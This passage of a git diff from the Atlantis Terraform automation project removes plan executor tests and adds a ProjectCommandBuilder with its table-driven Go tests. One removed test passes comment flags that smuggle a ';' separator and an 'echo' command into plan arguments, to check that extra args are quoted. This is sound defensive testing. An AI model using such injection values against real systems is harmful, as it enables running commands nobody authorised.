- vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
- "github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers"
- "github.com/runatlantis/atlantis/server/logging"
- . "github.com/runatlantis/atlantis/testing"
-)
-
-var planCtx = events.CommandContext{
- Command: &events.Command{
- Name: events.Plan,
- Workspace: "workspace",
- Dir: "",
- },
- Log: logging.NewNoopLogger(),
- BaseRepo: models.Repo{},
- HeadRepo: models.Repo{},
- Pull: models.PullRequest{},
- User: models.User{
- Username: "anubhavmishra",
- },
-}
-
-func TestExecute_ModifiedFilesErr(t *testing.T) {
- t.Log("If GetModifiedFiles returns an error we return an error")
- p, _, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err"))
- r := p.Execute(&planCtx)
-
- Assert(t, r.Error != nil, "exp .Error to be set")
- Equals(t, "getting modified files: err", r.Error.Error())
-}
-
-func TestExecute_NoModifiedProjects(t *testing.T) {
- t.Log("If there are no modified projects we return a failure")
- p, _, _ := setupPlanExecutorTest(t)
- // We don't need to actually mock VCSClient.GetModifiedFiles because by
- // default it will return an empty slice which is what we want for this test.
- r := p.Execute(&planCtx)
-
- Equals(t, "No Terraform files were modified.", r.Failure)
-}
-
-func TestExecute_CloneErr(t *testing.T) {
- t.Log("If AtlantisWorkspace.Clone returns an error we return an error")
- p, _, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err"))
- r := p.Execute(&planCtx)
-
- Assert(t, r.Error != nil, "exp .Error to be set")
- Equals(t, "err", r.Error.Error())
-}
-
-func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) {
- t.Log("Test that we run plan in the right directory and workspace if they're set")
- p, runner, _ := setupPlanExecutorTest(t)
- ctx := deepcopy.Copy(planCtx).(events.CommandContext)
- ctx.Log = logging.NewNoopLogger()
- ctx.Command.Dir = "dir1/dir2"
- ctx.Command.Workspace = "workspace-flag"
-
- When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")).
- ThenReturn("/tmp/clone-repo", nil)
- When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})).
- ThenReturn(events.PreExecuteResult{
- LockResponse: locking.TryLockResponse{
- LockKey: "key",
- },
- })
- r := p.Execute(&ctx)
-
- runner.VerifyWasCalledOnce().RunCommandWithVersion(
- ctx.Log,
- "/tmp/clone-repo/dir1/dir2",
- []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"},
- nil,
- "workspace-flag",
- )
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
- Equals(t, "", result.PlanSuccess.TerraformOutput)
- Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_AddedArgs(t *testing.T) {
- t.Log("Test that we include extra-args added to the comment in the plan command")
- p, runner, _ := setupPlanExecutorTest(t)
- ctx := deepcopy.Copy(planCtx).(events.CommandContext)
- ctx.Log = logging.NewNoopLogger()
- ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""}
-
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
- When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
- ThenReturn(events.PreExecuteResult{
- LockResponse: locking.TryLockResponse{
- LockKey: "key",
- },
- })
- r := p.Execute(&ctx)
-
- runner.VerifyWasCalledOnce().RunCommandWithVersion(
- ctx.Log,
- "/tmp/clone-repo",
- []string{
- "plan",
- "-refresh",
- "-no-color",
- "-out",
- "/tmp/clone-repo/workspace.tfplan",
- "-var",
- "atlantis_user=anubhavmishra",
- // NOTE: extra args should be quoted to prevent an attacker from
- // appending malicious commands.
- "\"-target=resource\"",
- "\"-var\"",
- "\"a=b\"",
- "\";\"",
- "\"echo\"",
- "\"hi\"",
- },
- nil,
- "workspace",
- )
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
- Equals(t, "", result.PlanSuccess.TerraformOutput)
- Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_Success(t *testing.T) {
- t.Log("If there are no errors, the plan should be returned")
- p, runner, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
- ThenReturn(events.PreExecuteResult{
- LockResponse: locking.TryLockResponse{
- LockKey: "key",
- },
- })
-
- r := p.Execute(&planCtx)
-
- runner.VerifyWasCalledOnce().RunCommandWithVersion(
- planCtx.Log,
- "/tmp/clone-repo",
- []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
- nil,
- "workspace",
- )
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil")
- Equals(t, "", result.PlanSuccess.TerraformOutput)
- Equals(t, "lockurl-key", result.PlanSuccess.LockURL)
-}
-
-func TestExecute_PreExecuteResult(t *testing.T) {
- t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it")
- p, _, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
- projectResult := events.ProjectResult{
- Failure: "failure",
- }
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
- ThenReturn(events.PreExecuteResult{ProjectResult: projectResult})
- r := p.Execute(&planCtx)
-
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Equals(t, "failure", result.Failure)
-}
-
-func TestExecute_MultiProjectFailure(t *testing.T) {
- t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.")
- p, runner, locker := setupPlanExecutorTest(t)
- // Two projects have been modified so we should run plan in two paths.
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
-
- // Both projects will succeed in the PreExecute stage.
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})).
- ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}})
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})).
- ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}})
-
- // The first project will fail when running plan
- When(runner.RunCommandWithVersion(
- planCtx.Log,
- "/tmp/clone-repo/path1",
- []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"},
- nil,
- "workspace",
- )).ThenReturn("", errors.New("path1 err"))
- // The second will succeed. We don't need to stub it because by default it
- // will return a nil error.
- r := p.Execute(&planCtx)
-
- // We expect Unlock to be called for the failed project.
- locker.VerifyWasCalledOnce().Unlock("key1")
-
- // So at the end we expect the first project to return an error and the second to be successful.
- Assert(t, len(r.ProjectResults) == 2, "exp two project results")
- result1 := r.ProjectResults[0]
- Assert(t, result1.Error != nil, "exp err to not be nil")
- Equals(t, "path1 err\n", result1.Error.Error())
-
- result2 := r.ProjectResults[1]
- Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil")
- Equals(t, "", result2.PlanSuccess.TerraformOutput)
- Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL)
-}
-
-func TestExecute_PostPlanCommands(t *testing.T) {
- t.Log("Should execute post-plan commands and return if there is an error")
- p, _, _ := setupPlanExecutorTest(t)
- When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil)
- When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).
- ThenReturn("/tmp/clone-repo", nil)
- When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})).
- ThenReturn(events.PreExecuteResult{
- ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}},
- })
- When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")).
- ThenReturn("", errors.New("err"))
-
- r := p.Execute(&planCtx)
-
- Assert(t, len(r.ProjectResults) == 1, "exp one project result")
- result := r.ProjectResults[0]
- Assert(t, result.Error != nil, "exp plan error to not be nil")
- Equals(t, "running post plan commands: err", result.Error.Error())
-}
-
-func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) {
- RegisterMockTestingT(t)
- vcsProxy := vcsmocks.NewMockClientProxy()
- w := mocks.NewMockAtlantisWorkspace()
- ppe := mocks.NewMockProjectPreExecutor()
- runner := tmocks.NewMockClient()
- locker := lmocks.NewMockLocker()
- run := rmocks.NewMockRunner()
- p := events.PlanExecutor{
- VCSClient: vcsProxy,
- ProjectFinder: &events.DefaultProjectFinder{},
- Workspace: w,
- ProjectPreExecute: ppe,
- Terraform: runner,
- Locker: locker,
- Run: run,
- }
- p.LockURL = func(id string) (url string) {
- return "lockurl-" + id
- }
- return &p, runner, locker
-}
diff --git a/server/events/project_command_builder.go b/server/events/project_command_builder.go
new file mode 100644
index 0000000000..456825f0c2
--- /dev/null
+++ b/server/events/project_command_builder.go
@@ -0,0 +1,236 @@
+package events
+
+import (
+ "fmt"
+
+ "github.com/hashicorp/go-version"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/vcs"
+ "github.com/runatlantis/atlantis/server/events/yaml"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_command_builder.go ProjectCommandBuilder
+
+type ProjectCommandBuilder interface {
+ BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error)
+ BuildPlanCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error)
+ BuildApplyCommand(ctx *CommandContext, commentCommand *CommentCommand) (models.ProjectCommandContext, error)
+}
+
+type DefaultProjectCommandBuilder struct {
+ ParserValidator *yaml.ParserValidator
+ ProjectFinder ProjectFinder
+ VCSClient vcs.ClientProxy
+ WorkingDir WorkingDir
+ WorkingDirLocker WorkingDirLocker
+ AllowRepoConfig bool
+ AllowRepoConfigFlag string
+}
+
+type TerraformExec interface {
+ RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
+}
+
+func (p *DefaultProjectCommandBuilder) BuildAutoplanCommands(ctx *CommandContext) ([]models.ProjectCommandContext, error) {
+ // Need to lock the workspace we're about to clone to.
+ workspace := DefaultWorkspace
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, workspace, ctx.Pull.Num)
+ if err != nil {
+ ctx.Log.Warn("workspace was locked")
+ return nil, err
+ }
+ ctx.Log.Debug("got workspace lock")
+ defer unlockFn()
+
+ repoDir, err := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, workspace)
+ if err != nil {
+ return nil, err
+ }
+
+ // Parse config file if it exists.
+ var config valid.Config
+ hasConfigFile, err := p.ParserValidator.HasConfigFile(repoDir)
+ if err != nil {
+ return nil, errors.Wrapf(err, "looking for %s file in %q", yaml.AtlantisYAMLFilename, repoDir)
+ }
+ if hasConfigFile {
+ if !p.AllowRepoConfig {
+ return nil, fmt.Errorf("%s files not allowed because Atlantis is not running with --%s", yaml.AtlantisYAMLFilename, p.AllowRepoConfigFlag)
+ }
+ config, err = p.ParserValidator.ReadConfig(repoDir)
+ if err != nil {
+ return nil, err
+ }
+ ctx.Log.Info("successfully parsed %s file", yaml.AtlantisYAMLFilename)
+ } else {
+ ctx.Log.Info("found no %s file", yaml.AtlantisYAMLFilename)
+ }
+
+ // We'll need the list of modified files.
+ modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull)
+ if err != nil {
+ return nil, err
+ }
+ ctx.Log.Debug("%d files were modified in this pull request", len(modifiedFiles))
+
+ // Prepare the project contexts so the ProjectCommandRunner can execute.
+ var projCtxs []models.ProjectCommandContext
+
+ // If there is no config file, then we try to plan for each project that
+ // was modified in the pull request.
+ if !hasConfigFile {
+ modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir)
+ ctx.Log.Info("automatically determined that there were %d projects modified in this pull request: %s", len(modifiedProjects), modifiedProjects)
+ for _, mp := range modifiedProjects {
+ projCtxs = append(projCtxs, models.ProjectCommandContext{
+ BaseRepo: ctx.BaseRepo,
+ HeadRepo: ctx.HeadRepo,
+ Pull: ctx.Pull,
+ User: ctx.User,
+ Log: ctx.Log,
+ RepoRelDir: mp.Path,
+ ProjectConfig: nil,
+ GlobalConfig: nil,
+ CommentArgs: nil,
+ Workspace: DefaultWorkspace,
+ })
+ }
+ } else {
+ // Otherwise, we use the projects that match the WhenModified fields
+ // in the config file.
+ matchingProjects, err := p.ProjectFinder.DetermineProjectsViaConfig(ctx.Log, modifiedFiles, config, repoDir)
+ if err != nil {
+ return nil, err
+ }
+ ctx.Log.Info("%d projects are to be autoplanned based on their when_modified config", len(matchingProjects))
+
+ // Use for i instead of range because need to get the pointer to the
+ // project config.
+ for i := 0; i < len(matchingProjects); i++ {
+ mp := matchingProjects[i]
+ projCtxs = append(projCtxs, models.ProjectCommandContext{
+ BaseRepo: ctx.BaseRepo,
+ HeadRepo: ctx.HeadRepo,
+ Pull: ctx.Pull,
+ User: ctx.User,
+ Log: ctx.Log,
+ CommentArgs: nil,
+ Workspace: mp.Workspace,
+ RepoRelDir: mp.Dir,
+ ProjectConfig: &mp,
+ GlobalConfig: &config,
+ })
+ }
+ }
+ return projCtxs, nil
+}
+
+func (p *DefaultProjectCommandBuilder) BuildPlanCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
+ var projCtx models.ProjectCommandContext
+
+ ctx.Log.Debug("building plan command")
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
+ if err != nil {
+ return projCtx, err
+ }
+ defer unlockFn()
+
+ ctx.Log.Debug("cloning repository")
+ repoDir, err := p.WorkingDir.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, cmd.Workspace)
+ if err != nil {
+ return projCtx, err
+ }
+
+ return p.buildProjectCommandCtx(ctx, cmd, repoDir)
+}
+
+func (p *DefaultProjectCommandBuilder) BuildApplyCommand(ctx *CommandContext, cmd *CommentCommand) (models.ProjectCommandContext, error) {
+ var projCtx models.ProjectCommandContext
+
+ unlockFn, err := p.WorkingDirLocker.TryLock(ctx.BaseRepo.FullName, cmd.Workspace, ctx.Pull.Num)
+ if err != nil {
+ return projCtx, err
+ }
+ defer unlockFn()
+
+ repoDir, err := p.WorkingDir.GetWorkingDir(ctx.BaseRepo, ctx.Pull, cmd.Workspace)
+ if err != nil {
+ return projCtx, err
+ }
+
+ return p.buildProjectCommandCtx(ctx, cmd, repoDir)
+}
+
+func (p *DefaultProjectCommandBuilder) buildProjectCommandCtx(ctx *CommandContext, cmd *CommentCommand, repoDir string) (models.ProjectCommandContext, error) {
+ projCfg, globalCfg, err := p.getCfg(cmd.ProjectName, cmd.RepoRelDir, cmd.Workspace, repoDir)
+ if err != nil {
+ return models.ProjectCommandContext{}, err
+ }
+
+ // Override any dir/workspace defined on the comment with what was
+ // defined in config. This shouldn't matter since we don't allow comments
+ // with both project name and dir/workspace.
+ dir := cmd.RepoRelDir
+ workspace := cmd.Workspace
+ if projCfg != nil {
+ dir = projCfg.Dir
+ workspace = projCfg.Workspace
+ }
+
+ return models.ProjectCommandContext{
+ BaseRepo: ctx.BaseRepo,
+ HeadRepo: ctx.HeadRepo,
+ Pull: ctx.Pull,
+ User: ctx.User,
+ Log: ctx.Log,
+ CommentArgs: cmd.Flags,
+ Workspace: workspace,
+ RepoRelDir: dir,
+ ProjectConfig: projCfg,
+ GlobalConfig: globalCfg,
+ }, nil
+}
+
+func (p *DefaultProjectCommandBuilder) getCfg(projectName string, dir string, workspace string, repoDir string) (*valid.Project, *valid.Config, error) {
+ hasConfigFile, err := p.ParserValidator.HasConfigFile(repoDir)
+ if err != nil {
+ return nil, nil, errors.Wrapf(err, "looking for %s file in %q", yaml.AtlantisYAMLFilename, repoDir)
+ }
+ if !hasConfigFile {
+ if projectName != "" {
+ return nil, nil, fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)
+ }
+ return nil, nil, nil
+ }
+
+ if !p.AllowRepoConfig {
+ return nil, nil, fmt.Errorf("%s files not allowed because Atlantis is not running with --%s", yaml.AtlantisYAMLFilename, p.AllowRepoConfigFlag)
+ }
+
+ globalCfg, err := p.ParserValidator.ReadConfig(repoDir)
+ if err != nil {
+ return nil, nil, err
+ }
+
+ // If they've specified a project by name we look it up. Otherwise we
+ // use the dir and workspace.
+ if projectName != "" {
+ projCfg := globalCfg.FindProjectByName(projectName)
+ if projCfg == nil {
+ return nil, nil, fmt.Errorf("no project with name %q is defined in %s", projectName, yaml.AtlantisYAMLFilename)
+ }
+ return projCfg, &globalCfg, nil
+ }
+
+ projCfgs := globalCfg.FindProjectsByDirWorkspace(dir, workspace)
+ if len(projCfgs) == 0 {
+ return nil, nil, nil
+ }
+ if len(projCfgs) > 1 {
+ return nil, nil, fmt.Errorf("must specify project name: more than one project defined in %s matched dir: %q workspace: %q", yaml.AtlantisYAMLFilename, dir, workspace)
+ }
+ return &projCfgs[0], &globalCfg, nil
+}
diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go
new file mode 100644
index 0000000000..e9278a2042
--- /dev/null
+++ b/server/events/project_command_builder_test.go
@@ -0,0 +1,458 @@
+package events_test
+
+import (
+ "io/ioutil"
+ "path/filepath"
+ "testing"
+
+ . "github.com/petergtz/pegomock"
+ "github.com/runatlantis/atlantis/server/events"
+ "github.com/runatlantis/atlantis/server/events/mocks"
+ "github.com/runatlantis/atlantis/server/events/models"
+ vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks"
+ "github.com/runatlantis/atlantis/server/events/yaml"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectCommandBuilder_BuildAutoplanCommands(t *testing.T) {
+ // exp defines what we will assert on. We don't check all fields in the
+ // actual contexts.
+ type exp struct {
+ projectConfig *valid.Project
+ dir string
+ workspace string
+ }
+ cases := []struct {
+ Description string
+ AtlantisYAML string
+ exp []exp
+ }{
+ {
+ Description: "no atlantis.yaml",
+ AtlantisYAML: "",
+ exp: []exp{
+ {
+ projectConfig: nil,
+ dir: ".",
+ workspace: "default",
+ },
+ },
+ },
+ {
+ Description: "autoplan disabled",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ autoplan:
+ enabled: false`,
+ exp: nil,
+ },
+ {
+ Description: "simple atlantis.yaml",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+`,
+ exp: []exp{
+ {
+ projectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "default",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ dir: ".",
+ workspace: "default",
+ },
+ },
+ },
+ {
+ Description: "some projects disabled",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ autoplan:
+ enabled: false
+- dir: .
+ workspace: myworkspace
+ autoplan:
+ when_modified: ["main.tf"]
+- dir: .
+ workspace: myworkspace2
+`,
+ exp: []exp{
+ {
+ projectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"main.tf"},
+ },
+ },
+ dir: ".",
+ workspace: "myworkspace",
+ },
+ {
+ projectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace2",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ dir: ".",
+ workspace: "myworkspace2",
+ },
+ },
+ },
+ {
+ Description: "some projects disabled",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ autoplan:
+ enabled: false
+- dir: .
+ workspace: myworkspace
+ autoplan:
+ when_modified: ["main.tf"]
+- dir: .
+ workspace: myworkspace2
+`,
+ exp: []exp{
+ {
+ projectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"main.tf"},
+ },
+ },
+ dir: ".",
+ workspace: "myworkspace",
+ },
+ {
+ projectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace2",
+ Autoplan: valid.Autoplan{
+ Enabled: true,
+ WhenModified: []string{"**/*.tf"},
+ },
+ },
+ dir: ".",
+ workspace: "myworkspace2",
+ },
+ },
+ },
+ {
+ Description: "no projects modified",
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: mydir
+`,
+ exp: nil,
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.Description, func(t *testing.T) {
+ RegisterMockTestingT(t)
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ baseRepo := models.Repo{}
+ headRepo := models.Repo{}
+ pull := models.PullRequest{}
+ logger := logging.NewNoopLogger()
+ workingDir := mocks.NewMockWorkingDir()
+ When(workingDir.Clone(logger, baseRepo, headRepo, pull, "default")).ThenReturn(tmpDir, nil)
+ if c.AtlantisYAML != "" {
+ err := ioutil.WriteFile(filepath.Join(tmpDir, yaml.AtlantisYAMLFilename), []byte(c.AtlantisYAML), 0600)
+ Ok(t, err)
+ }
+ err := ioutil.WriteFile(filepath.Join(tmpDir, "main.tf"), nil, 0600)
+ Ok(t, err)
+
+ vcsClient := vcsmocks.NewMockClientProxy()
+ When(vcsClient.GetModifiedFiles(baseRepo, pull)).ThenReturn([]string{"main.tf"}, nil)
+
+ builder := &events.DefaultProjectCommandBuilder{
+ WorkingDirLocker: events.NewDefaultWorkingDirLocker(),
+ WorkingDir: workingDir,
+ ParserValidator: &yaml.ParserValidator{},
+ VCSClient: vcsClient,
+ ProjectFinder: &events.DefaultProjectFinder{},
+ AllowRepoConfig: true,
+ }
+
+ ctxs, err := builder.BuildAutoplanCommands(&events.CommandContext{
+ BaseRepo: baseRepo,
+ HeadRepo: headRepo,
+ Pull: pull,
+ User: models.User{},
+ Log: logger,
+ })
+ Ok(t, err)
+ Equals(t, len(c.exp), len(ctxs))
+
+ for i, actCtx := range ctxs {
+ expCtx := c.exp[i]
+ Equals(t, baseRepo, actCtx.BaseRepo)
+ Equals(t, baseRepo, actCtx.HeadRepo)
+ Equals(t, pull, actCtx.Pull)
+ Equals(t, models.User{}, actCtx.User)
+ Equals(t, logger, actCtx.Log)
+ Equals(t, 0, len(actCtx.CommentArgs))
+
+ Equals(t, expCtx.projectConfig, actCtx.ProjectConfig)
+ Equals(t, expCtx.dir, actCtx.RepoRelDir)
+ Equals(t, expCtx.workspace, actCtx.Workspace)
+ }
+ })
+ }
+}
+
+func TestDefaultProjectCommandBuilder_BuildPlanApplyCommand(t *testing.T) {
+ cases := []struct {
+ Description string
+ AtlantisYAML string
+ Cmd events.CommentCommand
+ ExpProjectConfig *valid.Project
+ ExpCommentArgs []string
+ ExpWorkspace string
+ ExpDir string
+ ExpErr string
+ }{
+ {
+ Description: "no atlantis.yaml",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Flags: []string{"commentarg"},
+ Name: events.Plan,
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: "",
+ ExpProjectConfig: nil,
+ ExpCommentArgs: []string{"commentarg"},
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "no atlantis.yaml with project flag",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Name: events.Plan,
+ ProjectName: "myproject",
+ },
+ AtlantisYAML: "",
+ ExpErr: "cannot specify a project name unless an atlantis.yaml file exists to configure projects",
+ },
+ {
+ Description: "simple atlantis.yaml",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Name: events.Plan,
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ workspace: myworkspace
+ apply_requirements: [approved]`,
+ ExpProjectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: []string{"approved"},
+ },
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "atlantis.yaml wrong dir",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Name: events.Plan,
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: notroot
+ workspace: myworkspace
+ apply_requirements: [approved]`,
+ ExpProjectConfig: nil,
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "atlantis.yaml wrong workspace",
+ Cmd: events.CommentCommand{
+ RepoRelDir: ".",
+ Name: events.Plan,
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+ workspace: notmyworkspace
+ apply_requirements: [approved]`,
+ ExpProjectConfig: nil,
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "atlantis.yaml with projectname",
+ Cmd: events.CommentCommand{
+ Name: events.Plan,
+ ProjectName: "myproject",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- name: myproject
+ dir: .
+ workspace: myworkspace
+ apply_requirements: [approved]`,
+ ExpProjectConfig: &valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: []string{"approved"},
+ Name: String("myproject"),
+ },
+ ExpWorkspace: "myworkspace",
+ ExpDir: ".",
+ },
+ {
+ Description: "atlantis.yaml with multiple dir/workspaces matching",
+ Cmd: events.CommentCommand{
+ Name: events.Plan,
+ RepoRelDir: ".",
+ Workspace: "myworkspace",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- name: myproject
+ dir: .
+ workspace: myworkspace
+ apply_requirements: [approved]
+- name: myproject2
+ dir: .
+ workspace: myworkspace
+`,
+ ExpErr: "must specify project name: more than one project defined in atlantis.yaml matched dir: \".\" workspace: \"myworkspace\"",
+ },
+ {
+ Description: "atlantis.yaml with project flag not matching",
+ Cmd: events.CommentCommand{
+ Name: events.Plan,
+ RepoRelDir: ".",
+ Workspace: "default",
+ ProjectName: "notconfigured",
+ },
+ AtlantisYAML: `
+version: 2
+projects:
+- dir: .
+`,
+ ExpErr: "no project with name \"notconfigured\" is defined in atlantis.yaml",
+ },
+ }
+
+ for _, c := range cases {
+ // NOTE: we're testing both plan and apply here.
+ for _, cmdName := range []events.CommandName{events.Plan, events.Apply} {
+ t.Run(c.Description, func(t *testing.T) {
+ RegisterMockTestingT(t)
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+
+ baseRepo := models.Repo{}
+ headRepo := models.Repo{}
+ pull := models.PullRequest{}
+ logger := logging.NewNoopLogger()
+ workingDir := mocks.NewMockWorkingDir()
+ if cmdName == events.Plan {
+ When(workingDir.Clone(logger, baseRepo, headRepo, pull, c.Cmd.Workspace)).ThenReturn(tmpDir, nil)
+ } else {
